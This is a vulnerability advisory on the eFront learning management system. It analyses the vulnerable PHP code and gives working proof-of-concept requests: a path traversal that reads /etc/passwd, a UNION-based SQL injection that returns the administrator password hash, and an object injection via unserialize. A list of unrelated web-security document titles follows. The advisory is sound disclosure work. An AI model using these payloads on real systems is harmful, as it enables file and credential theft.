Security Research Advisory
|
|
- Brice Boone
- 8 years ago
- Views:
Transcription
1 Security Research Advisory efront Multiple Vulnerabilities (+39) Italia PoliHub Via Giovanni Durando, Milano United Kingdom New Bridge Street House 30-34, New Bridge Street EC4V 6BJ, London
2 Table of Contents SUMMARY PATH TRAVERSAL VULNERABILITY DETAILS TECHNICAL DETAILS MULTIPLE SQL INJECTIONS VULNERABILITY DETAILS TECHNICAL DETAILS FURTHER CONSIDERATIONS LEGAL NOTICES Secure Network Security Research Advisory efront Multiple Vulnerabilities 2
3 Summary efront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: efront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon- based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others. Multiple vulnerabilities have been identified in efront version Lack of proper sanitization leads to a critical Path Traversal vulnerability and multiple SQL injections. Date Details 13/04/2015 Vendor disclosure n/a n/a Vendor acknowledgment Patch release 01/05/2015 Public disclosure
4 Path Traversal Path Traversal Advisory Number SN Severity Software Version Accessibility CVE Author(s) H efront Remote n/a Vendor URL Advisory URL - Luca De Fulgentis Filippo Roncari Vulnerability Details efront is prone to a critical path traversal vulnerability involving the view_file.php module, due to improper user- input sanitization and unsafe inner normalize() function logic. An attacker could exploit this vulnerability by manipulating http parameter value in order to climb the directories tree and access arbitrary files on the remote file system. This issue can lead to critical confidentiality violations, depending on the privileges assigned to the application server. Technical Details Description Attachments and documents download is performed through the view_file.php module. The file is requested through the file parameter, which is then used to instantiate a new EfrontFile object (defined in filesystem.class.php). An EfrontFile object can be created from a file ID, a database record, an array and, obviously, a file path. In the object constructor the path contained in file parameter is firstly normalised to obtain the real absolute path and to avoid the injection of malicious characters sequences, such as../. After that, some checks are performed in order to assure that only existing files within the efront base path (G_ROOTPATH) can be downloaded. The described steps are part of the code snippet reported below. File: libraries/filesystem.class.php Function: construct() [EfrontFile class] function construct($file) { if (is_array($file)) { //Instantiate object based on the given array $file['path'] = EfrontDirectory :: normalize($file['path']); if (strpos($file['path'], G_ROOTPATH) === false) { $file['path'] = G_ROOTPATH.$file['path']; $filearray = $file; else { if (ef_checkparameter($file, 'id')) { //Instantiate object based on id $result = ef_gettabledata("files", "*", "id=".$file, "id"); elseif (ef_checkparameter($file, 'path')) { //id-based instantiation failed; Check if the full path is specified $file = EfrontDirectory :: normalize($file); $result = ef_gettabledata("files", "*", "path='".str_replace(g_rootpath, '', ef_addslashes(efrontdirectory :: normalize($file)))."'", "id"); //ef_addslashes for files containing ' Secure Network Security Research Advisory efront Multiple Vulnerabilities 4
5 else { throw new EfrontFileException(_ILLEGALPATH.': '.efront_basename($file), EfrontFileException :: ILLEGAL_PATH); [ ] if (is_file($file) && strpos($file, G_ROOTPATH)!== false) { //Create object without database information $filearray = array('id' => -1, //Set 'id' to -1, meaning this file has not a database representation 'path' => $file); else if (strpos($file, G_ROOTPATH) === false) { throw new EfrontFileException(_ILLEGALPATH.': '.efront_basename($file), EfrontFileException :: ILLEGAL_PATH); else { throw new EfrontFileException(_FILEDOESNOTEXIST.': '.efront_basename($file), EfrontFileException :: FILE_NOT_EXIST); At a first sight, it seems to be quite enough secure because if the path is correctly normalised there would be no chance to inject an arbitrary path that contains also the G_ROOTPATH (efront base directory), using, for example, a dot- dot- slash sequence. However, a deeper analysis highlighted some interesting issues in the normalize() function logic. File: libraries/filesystem.class.php Function: normalize() public static function normalize($path) { $realpath = realpath($path); if ($realpath && file_exists($realpath)) { if (DIRECTORY_SEPARATOR == "\\") { return rtrim(str_replace("\\", "/", $realpath), "/"); else { return rtrim($realpath, "/"); else { if (DIRECTORY_SEPARATOR == "\\") { return rtrim(str_replace("\\", "/", $path), "/"); else { return rtrim($path, "/"); At start, the given $path is canonicalized through the realpath() PHP function. However, if the requested file does not exist or if realpath() fails, the original not- normalized $path variable is used in the else branch and the final slash is trimmed. This seemingly harmless operation is a key point of the vulnerability. Indeed, we should be able to exploit the identified issues, injecting a properly crafted path to a valid file making it appear invalid by the addition of a trailing /, in order to bypass the realpath() canonicalization. Thus, we can also traverse the directories to enter and exit the efront base path, bypassing in this way the construct() G_ROOTPATH check. A working Proof of Concept (PoC) is shown below. Proof of Concept PoC URL: HTTP Request: GET /test/efront/www/view_file.php?action=download&file=/applications/mamp/htdocs/test/efront/../../../../../etc/passwd/ HTTP/1.1 Host: localhost
6 Cookie: display_all_courses=1; PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; SQLiteManager_currentLangue=6; PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; parent_sid=d36bed784e063e65cf31721f8ec7a0bd HTTP Response: HTTP/ OK Date: Mon, 30 Mar :20:43 GMT Content-Description: File Transfer Content-Disposition: attachment; filename="passwd" Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Pragma: public Content-Length: 5253 Content-Type: application/download ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:unprivileged User:/var/empty:/usr/bin/false root:*:0:0:system Administrator:/var/root:/bin/sh daemon:*:1:1:system Services:/var/root:/usr/bin/false _uucp:*:4:4:unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:network Services:/var/networkd:/usr/bin/false [ ] Secure Network Security Research Advisory efront Multiple Vulnerabilities 6
7 Multiple SQL Injections Multiple SQL Injections Advisory Number SN Severity Software Version Accessibility CVE Author(s) H efront Remote n/a Vendor URL Advisory URL - Luca De Fulgentis Filippo Roncari Vulnerability Details The new_sidebar.php module, which handles the left side bar in efront default theme, is affected by multiple SQL injection vulnerabilities due to lack of user input sanitization. The identified issues allow unprivileged users, such as professors and students (under certain conditions), to inject arbitrary SQL statements. An attacker could exploit the vulnerabilities by sending specially crafted requests to the web application. These issues can lead to data theft, data disruption, account violation and other impacts depending on the DBMS s user privileges. Technical Details Description Two SQL injections exist in new_sidebar.php, whose vulnerable source code is reported below. Both can be triggered through the new_lesson_id parameter, whose content is stored inside $_SESSION['s_lessons_ID']. File: www/new_sidebar.php Function: if (isset($_get['new_lesson_id']) && $_GET['new_lesson_id']) { // This is a lesson specific menu $_SESSION['s_lessons_ID'] = $_GET['new_lesson_id']; if (!isset($currentlesson)) { $currentlesson = new EfrontLesson($_GET['new_lesson_id']); $lessonmenu = ef_getmenu(); //INJECTION POINT #1 $lessons = ef_gettabledata("users_to_lessons ul, lessons l", "l.name","ul.archive =0 and ul.users_login='".$_session['s_login']."' AND ul.active=1 AND l.id=ul.lessons_id AND l.active=1 AND l.id = '".$_GET['new_lesson_id']."'"); //INJECTION POINT #2 The first one affects the ef_getmenu() function, defined in tool.php, while the second one is observable in the line immediately after, in which the GET parameter new_lesson_id is included without sanitization in a SQL WHERE clause. The following is an excerpt of the ef_getmenu() function, which handles the sidebar menu content.
8 File: libraries/tools.php Function: ef_getmenu() if (EfrontUser::isOptionVisible('forum')) { $forums_id = ef_gettabledata("f_forums", "id", "lessons_id=".$_session['s_lessons_id']); if (sizeof($forums_id) > 0) { $menu['lesson']['forum'] = array('title' => _FORUM, 'link' => $_SESSION['s_type'].'.php?ctg=forum&forum='.$forums_id[0]['id'],'image' => 'message', 'id' => 'forum_a'); else { $menu['lesson']['forum'] = array('title' => _FORUM, 'link' => $_SESSION['s_type'].".php?ctg=forum",'image' => 'message', 'id' => 'forum_a'); As said before, the content of the new_lesson_id parameter is also copied, without being sanitized, inside $_SESSION[ s_lessons_id ], which is then included into a SQL query executed again through ef_gettabledata(), thus leading to injection of arbitrary SQL statements. Note: some important elements must be considered in the exploitation phase. 1. Before reaching the vulnerable sinks in new_sidebar.php, a if (!isset($currentlesson)) check is performed. If it fails, a new EfrontLesson object is instantiated from the new_lesson_id parameter. This must be avoided because the class constructor performs a validity check on the given ID throwing an exception in case of error, preventing vulnerable code from being executed. To set the $currentlesson variable an attacker could simply access a lesson (clicking on any open lesson) before executing the malicious request. 2. Students have further limitations, because of the following piece of code. File: libraries/tools.php Function: ef_getmenu() case 'student': if ($_SESSION['s_lessons_ID']!= false) { $menu['lesson']['control_panel'] = array('title' => _MAINPAGE, 'link' => 'student.php?ctg=control_panel', 'image' => 'home', 'target' => "mainframe", 'id' => 'lesson_main_a'); if ($GLOBALS['currentUser'] -> coreaccess['content']!= 'hidden') { $currentcontent = new EfrontContentTree($_SESSION['s_lessons_ID']); Exactly as before, the EfrontContentTree() constructor will throw an exception if the requested lesson ID is not valid, which is true when a query is injected. To avoid this, a potential attacker has to access a lesson for which his User Type has content set to hidden. User Types are sort of groups of users with specific role options and are managed by the administrators. Proof of Concept The following PoC shows the exploitation of the ef_getmenu() vulnerability, which can be easily exploited by joining an arbitrary SQL query through the UNION operator. During exploitation, take into account that in the second injection the user input is enclosed between quotes while in the first one is not, thus the injection of payloads containing single quotes should be avoided. HTTP Request: GET /test/efront/www/new_sidebar.php?sbctg=lessons&new_lesson_id=null+union+select+password+from+users+where+id=1 HTTP/1.1 Secure Network Security Research Advisory efront Multiple Vulnerabilities 8
9 Host: localhost Cookie: professor_sidebar=visible; SQLiteManager_currentLangue=2; PHPSESSID=dfa71c291f229b4b3b4e5bde43a844f2; parent_sid=dfa71c291f229b4b3b4e5bde43a844f2; professor_sidebarmode=automatic The administrator password hash is returned directly as part of the forum link in the sidebar menu. HTTP Response: HTTP/ OK Date: Thu, 09 Apr :42:19 GMT Expires: Mon, 26 Jul :00:00 GMT Content-Type: text/html Content-Length: [ ] <div class = "menuoption" name="lessonspecific" id="forum_a" > <table> <tr> <td> <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" target="mainframe"> <img src='themes/default/images/others/transparent.gif' class = 'handle sprite16 sprite16-message' > </a> </td> <td class = "menulistoption" > <a href = "professor.php?ctg=forum&forum=11ff89cb38b258fb50fe8672c18ff79b" title="forum" target="mainframe">forum</a> </td> </tr> </table> </div> [ ]
10 Further Considerations A PHP Object Injection issue affects the copy.php script, which handles the copying of content between lessons, and others probably exist, due to the frequent use of deserialization operations on non- sanitized user input. A common way to exploit this vulnerability is to find a PHP magic method ( that can be abused and inject a properly crafted arbitrary object in order to trigger it. File: libraries/includes/copy.php Function: if ($_GET['transfered']) { $transferednodescheck = unserialize($_get['transfered']); $copiedtests = array(); $copiedunits = array(); $map = array(); foreach ($nodeorders as $value) { list($id, $parentcontentid) = explode("-", $value); if (!in_array($id, $transferednodescheck)) { The injection affects the transfered parameter, as shown in the following exemplifying HTTP communication. HTTP Request: GET /test/efront/www/professor.php?ctg=copy&from=8&node_orders=&transfered=[serialized_arbitrary_object]&mode&a jax=ajax&csrf_id=6ebb0b3aee60a1764e780e a8e HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.7 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/ (KHTML, like Gecko) Chrome/ Safari/ Referer: Cookie: display_all_courses=1; setformrowshidden=0; PHPSESSID=6ebb0b3aee60a1764e780e a8e; SQLiteManager_currentLangue=2; PHPSESSID=6ebb0b3aee60a1764e780e a8e; professor_sidebar=hidden; professor_sidebarmode=automatic; parent_sid=6ebb0b3aee60a1764e780e a8e Although a deeper analysis has not been performed, no useful PHP magic methods ( have been identified in order to exploit this specific vulnerability. Because the unmarshalled user input $transferednodescheck is exclusively used within an in_array() call, only wakeup() and destruct() methods could be abused to exploit the issue. However, none of those lends itself to the purpose. The vulnerability could still be abused in case of PHP vulnerable version (e.g., CVE ). Moreover, further analysis or future efront updates could open unexpected attack scenarios with high impact consequences. Secure Network Security Research Advisory efront Multiple Vulnerabilities 10
11 Legal Notices Secure Network ( is an information security company, which provides consulting and training services, and engages in security research and development. We are committed to open, full disclosure of vulnerabilities, cooperating with software developers for properly handling disclosure issues. This advisory is copyright 2015 Secure Network S.r.l. Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. It may not be edited in any way without the express consent of Secure Network S.r.l. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to Secure Network. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as- is, as a free service to the community by Secure Network research staff. There are no warranties with regard to this information. Secure Network does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. If you have any comments or inquiries, or any issue with what is reported in this advisory, please inform us as soon as possible.
Security Research Advisory IBM inotes 9 Active Content Filtering Bypass
Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 7 Active Content Filtering Bypass Advisory
More informationSecurity Research Advisory SugarCRM 6.5.17 Cross-Site Scripting Vulnerability
Security Research Advisory SugarCRM 6.5.17 Cross-Site Scripting Vulnerability Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 6 Cross Site Scripting Advisory Number
More informationPlaying with Web Application Firewalls
Playing with Web Application Firewalls Who is Wendel? Independent penetration test analyst. Affiliated to Hackaholic team. Over 7 years in the security industry. Discovered vulnerabilities in Webmails,
More informationBld. du Roi Albert II, 27, B 1030 BRUSSELS Tel. +32 2 203 82 82 Fax. +32 2 203 82 87 www.scanit.be. Secure file upload in PHP web applications
Bld. du Roi Albert II, 27, B 1030 BRUSSELS Tel. +32 2 203 82 82 Fax. +32 2 203 82 87 www.scanit.be Secure file upload in PHP web applications Alla Bezroutchko June 13, 2007 Table of Contents Introduction......3
More informationWebapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
More informationPlaying with Web Application Firewalls
Playing with Web Application Firewalls DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA Who is Wendel Guglielmetti Henrique? Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division
More informationWeb applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
More informationCheck list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
More informationBug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca)
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
More informationSecurity-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet
Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet Prepared by: Roberto Suggi Liverani Senior Security Consultant Security-Assessment.com
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More informationAbusing the Internet of Things. BLACKOUTS. FREAKOUTS. AND STAKEOUTS. @nitesh_dhanjani
2014 Abusing the Internet of Things. BLACKOUTS. FREAKOUTS. AND STAKEOUTS. @nitesh_dhanjani We are going to depend on IoT devices for our privacy and physical security at work and at home. Vulnerabilities
More informationWeb Application Security
Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching
More informationA Tale of the Weaknesses of Current Client-side XSS Filtering
A Tale of the Weaknesses of Current Client-side XSS Filtering Sebastian Lekies (@sebastianlekies), Ben Stock (@kcotsneb) and Martin Johns (@datenkeller) Attention hackers! These slides are preliminary!
More informationColumbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationPHP code audits. OSCON 2009 San José, CA, USA July 21th 2009
PHP code audits OSCON 2009 San José, CA, USA July 21th 2009 1 Agenda Workshop presentation Black box audit Source code audit 2 Who speaks? Philippe Gamache Parler Haut, Interagir Librement : Web development,
More informationAPACHE WEB SERVER. Andri Mirzal, PhD N28-439-03
APACHE WEB SERVER Andri Mirzal, PhD N28-439-03 Introduction The Apache is an open source web server software program notable for playing a key role in the initial growth of the World Wide Web Typically
More informationDEERFIELD.COM. DNS2Go Update API. DNS2Go Update API
DEERFIELD.COM DNS2Go Update API DNS2Go Update API DEERFIELD.COM PRODUCT DOCUMENTATION DNS2Go Update API Deerfield.com 4241 Old U.S. 27 South Gaylord, MI 49686 Phone 989.732.8856 Email sales@deerfield.com
More informationHow To Compare Your Web Vulnerabilities To A Gamascan Report
Differential Report Target Scanned: www.gamasec-test.com Previous Scan: Wed Jul 2 15:29:12 2008 Recent Scan: Wed Jul 9 00:50:01 2008 Report Generated: Thu Jul 10 12:00:51 2008 Page 1 of 15 Differential
More informationCyber Security Workshop Ethical Web Hacking
Cyber Security Workshop Ethical Web Hacking May 2015 Setting up WebGoat and Burp Suite Hacking Challenges in WebGoat Concepts in Web Technologies and Ethical Hacking 1 P a g e Downloading WebGoat and Burp
More informationPHP Magic Tricks: Type Juggling. PHP Magic Tricks: Type Juggling
Who Am I Chris Smith (@chrismsnz) Previously: Polyglot Developer - Python, PHP, Go + more Linux Sysadmin Currently: Pentester, Consultant at Insomnia Security Little bit of research Insomnia Security Group
More informationHTTP Response Splitting
The Attack HTTP Response Splitting is a protocol manipulation attack, similar to Parameter Tampering The attack is valid only for applications that use HTTP to exchange data Works just as well with HTTPS
More informationPenetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com
More informationPHP Integration Kit. Version 2.5.1. User Guide
PHP Integration Kit Version 2.5.1 User Guide 2012 Ping Identity Corporation. All rights reserved. PingFederate PHP Integration Kit User Guide Version 2.5.1 December, 2012 Ping Identity Corporation 1001
More informationCyber Security Scan Report
Scan Customer Information Scan Company Information Company: Example Name Company: SRC Security Research & Consulting GmbH Contact: Mr. Example Contact: Holger von Rhein : : Senior Consultant Telephone:
More informationWeb Development using PHP (WD_PHP) Duration 1.5 months
Duration 1.5 months Our program is a practical knowledge oriented program aimed at learning the techniques of web development using PHP, HTML, CSS & JavaScript. It has some unique features which are as
More informationHypertext for Hyper Techs
Hypertext for Hyper Techs An Introduction to HTTP for SecPros Bio Josh Little, GSEC ~14 years in IT. Support, Server/Storage Admin, Webmaster, Web App Dev, Networking, VoIP, Projects, Security. Currently
More informationFacebook Twitter YouTube Google Plus Website Email
PHP MySQL COURSE WITH OOP COURSE COVERS: PHP MySQL OBJECT ORIENTED PROGRAMMING WITH PHP SYLLABUS PHP 1. Writing PHP scripts- Writing PHP scripts, learn about PHP code structure, how to write and execute
More informationAnatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers
Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers By Deral (PercX) Heiland and Michael (omi) Belton Over the past year, one focus of the Foofus.NET
More informationProject 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
More informationExternal Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
More informationTesting Web Applications for SQL Injection Sam Shober SamShober@Hotmail.com
Testing Web Applications for SQL Injection Sam Shober SamShober@Hotmail.com Abstract: This paper discusses the SQL injection vulnerability, its impact on web applications, methods for pre-deployment and
More informationApplication Security Testing. Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il
Application Security Testing Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il Agenda The most common security vulnerabilities you should test for Understanding the problems
More informationWeb Vulnerability Assessment Report
Web Vulnerability Assessment Report Target Scanned: www.daflavan.com Report Generated: Mon May 5 14:43:24 2014 Identified Vulnerabilities: 39 Threat Level: High Screenshot of www.daflavan.com HomePage
More informationTable of Contents. Open-Xchange Authentication & Session Handling. 1.Introduction...3
Open-Xchange Authentication & Session Handling Table of Contents 1.Introduction...3 2.System overview/implementation...4 2.1.Overview... 4 2.1.1.Access to IMAP back end services...4 2.1.2.Basic Implementation
More informationWeb Security Threat Report: January April 2007. Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots
Web Security Threat Report: January April 2007 Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots What are we reporting? We are presenting real, live web attack data captured in-the-wild.
More informationFairsail REST API: Guide for Developers
Fairsail REST API: Guide for Developers Version 1.02 FS-API-REST-PG-201509--R001.02 Fairsail 2015. All rights reserved. This document contains information proprietary to Fairsail and may not be reproduced,
More informationSecurity Test s i t ng Eileen Donlon CMSC 737 Spring 2008
Security Testing Eileen Donlon CMSC 737 Spring 2008 Testing for Security Functional tests Testing that role based security functions correctly Vulnerability scanning and penetration tests Testing whether
More informationCommon Security Vulnerabilities in Online Payment Systems
Common Security Vulnerabilities in Online Payment Systems Author- Hitesh Malviya(Information Security analyst) Qualifications: C!EH, EC!SA, MCITP, CCNA, MCP Current Position: CEO at HCF Infosec Limited
More informationSQL Injection January 23, 2013
Web-based Attack: SQL Injection SQL Injection January 23, 2013 Authored By: Stephanie Reetz, SOC Analyst Contents Introduction Introduction...1 Web applications are everywhere on the Internet. Almost Overview...2
More information1. Building Testing Environment
The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,
More informationCloudOYE CDN USER MANUAL
CloudOYE CDN USER MANUAL Password - Based Access Logon to http://mycloud.cloudoye.com. Enter your Username & Password In case, you have forgotten your password, click Forgot your password to request a
More informationPhishing by data URI
Phishing by data URI Henning Klevjer henning@klevjers.com October 22, 2012 1 Abstract Historically, phishing web pages have been hosted by web servers that are either compromised or owned by the attacker.
More informationLecture 11 Web Application Security (part 1)
Lecture 11 Web Application Security (part 1) Computer and Network Security 4th of January 2016 Computer Science and Engineering Department CSE Dep, ACS, UPB Lecture 11, Web Application Security (part 1)
More informationWeb Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
More informationPenetration Testing Corporate Collaboration Portals. Giorgio Fedon, Co-Founder at Minded Security
Penetration Testing Corporate Collaboration Portals Giorgio Fedon, Co-Founder at Minded Security Something About Me Security Researcher Owasp Italy Member Web Application Security and Malware Research
More informationExploiting Local File Inclusion in A Co-Hosting Environment
Whitepaper Exploiting Local File Inclusion in A Co-Hosting Environment A Proof-of-Concept Utkarsh Bhatt Anant Kochhar TABLE OF CONTENTS Abstract... 4 Introduction... 4 Upload Modules... 4 Local File Inclusion...
More informationQualys API Limits. July 10, 2014. Overview. API Control Settings. Implementation
Qualys API Limits July 10, 2014 Overview The Qualys API enforces limits on the API calls a customer can make based on their subscription settings, starting with Qualys version 6.5. The limits apply to
More informationDetect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map
Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map Erwin Adi and Irene Salomo School of Computer Science BINUS International BINUS University, Indonesia
More informationWeb Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
More informationWhat is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
More informationPDG Software. Site Design Guide
PDG Software Site Design Guide PDG Software, Inc. 1751 Montreal Circle, Suite B Tucker, Georgia 30084-6802 Copyright 1998-2007 PDG Software, Inc.; All rights reserved. PDG Software, Inc. ("PDG Software")
More informationecommercesoftwareone Advance User s Guide -www.ecommercesoftwareone.com
Advance User s Guide -www.ecommercesoftwareone.com Contents Background 3 Method 4 Step 1 - Select Advance site layout 4 Step 2 - Identify Home page code of top/left and bottom/right sections 6 Step 3 -
More informationLogin with Amazon. Getting Started Guide for Websites. Version 1.0
Login with Amazon Getting Started Guide for Websites Version 1.0 Login with Amazon: Getting Started Guide for Websites Copyright 2016 Amazon Services, LLC or its affiliates. All rights reserved. Amazon
More informationCA Nimsoft Monitor. Probe Guide for E2E Application Response Monitoring. e2e_appmon v2.2 series
CA Nimsoft Monitor Probe Guide for E2E Application Response Monitoring e2e_appmon v2.2 series Copyright Notice This online help system (the "System") is for your informational purposes only and is subject
More informationHacker Intelligence Initiative, Monthly Trend Report #17
Sept 2013 Hacker Intelligence Initiative, Monthly Trend Report #17 PHP SuperGlobals: Supersized Trouble 1. Executive Summary For a while now, the ADC research group has been looking into the implication
More informationAn Oracle White Paper June 2014. RESTful Web Services for the Oracle Database Cloud - Multitenant Edition
An Oracle White Paper June 2014 RESTful Web Services for the Oracle Database Cloud - Multitenant Edition 1 Table of Contents Introduction to RESTful Web Services... 3 Architecture of Oracle Database Cloud
More informationChapter 2: Interactive Web Applications
Chapter 2: Interactive Web Applications 2.1 Interactivity and Multimedia in the WWW architecture 2.2 Interactive Client-Side Scripting for Multimedia (Example HTML5/JavaScript) 2.3 Interactive Server-Side
More informationPenetration Test Report
Penetration Test Report Acme Test Company ACMEIT System 26 th November 2010 Executive Summary Info-Assure Ltd was engaged by Acme Test Company to perform an IT Health Check (ITHC) on the ACMEIT System
More informationPre-authentication XXE vulnerability in the Services Drupal module
Pre-authentication XXE vulnerability in the Services Drupal module Security advisory 24/04/2015 Renaud Dubourguais www.synacktiv.com 14 rue Mademoiselle 75015 Paris 1. Vulnerability description 1.1. The
More informationAcunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)
Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06
More informationMalware Analysis Quiz 6
Malware Analysis Quiz 6 1. Are these files packed? If so, which packer? The file is not packed, as running the command strings shelll reveals a number of interesting character sequences, such as: irc.ircnet.net
More informationApplication Security Testing. Generic Test Strategy
Application Security Testing Generic Test Strategy Page 2 of 8 Contents 1 Introduction 3 1.1 Purpose: 3 1.2 Application Security Testing: 3 2 Audience 3 3 Test Strategy guidelines 3 3.1 Authentication
More informationFileMaker 12. ODBC and JDBC Guide
FileMaker 12 ODBC and JDBC Guide 2004 2012 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker and Bento are trademarks of FileMaker, Inc.
More informationAvactis PHP Shopping Cart (www.avactis.com) Full Disclosure
12/04/16 security@voidsec.com Avactis PHP Shopping Cart (www.avactis.com) Full Disclosure Performers: Maurizio Abdel Adim Oisfi - smaury@shielder.it Andrei Manole - manoleandrei94@gmail.com Luca Milano
More informationEVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
More informationAbusing Insecure Features of Internet Explorer
Abusing Insecure Features of Internet Explorer WHITE PAPER February 2010 Jorge Luis Alvarez Medina Security Consultant jorge.alvarez@coresecurity.com Abusing Insecure Features of Internet Explorer Contents
More informationInstallation & Activation Guide. Lepide Active Directory Self Service
Installation & Activation Guide Lepide Active Directory Self Service , All Rights Reserved This User Guide and documentation is copyright of Lepide Software Private Limited, with all rights reserved under
More informationExploits: XSS, SQLI, Buffer Overflow
Exploits: XSS, SQLI, Buffer Overflow These vulnerabilities continue to result in many active exploits. XSS Cross Site Scripting, comparable to XSRF, Cross Site Request Forgery. These vulnerabilities are
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationHow To Secure An Rsa Authentication Agent
RSA Authentication Agents Security Best Practices Guide Version 3 Contact Information Go to the RSA corporate web site for regional Customer Support telephone and fax numbers: www.rsa.com. Trademarks RSA,
More informationHTTPParameter Pollution. ChrysostomosDaniel
HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider
More informationLabour Market Programs Support System. LaMPSS Computer Compatibility Guide
Labour Market Programs Support System LaMPSS Computer Compatibility Guide Prepared by: LaMPSS Operations Support June 2012 Version: 1.1 2011 Nova Scotia Department of Labour and Advanced Education This
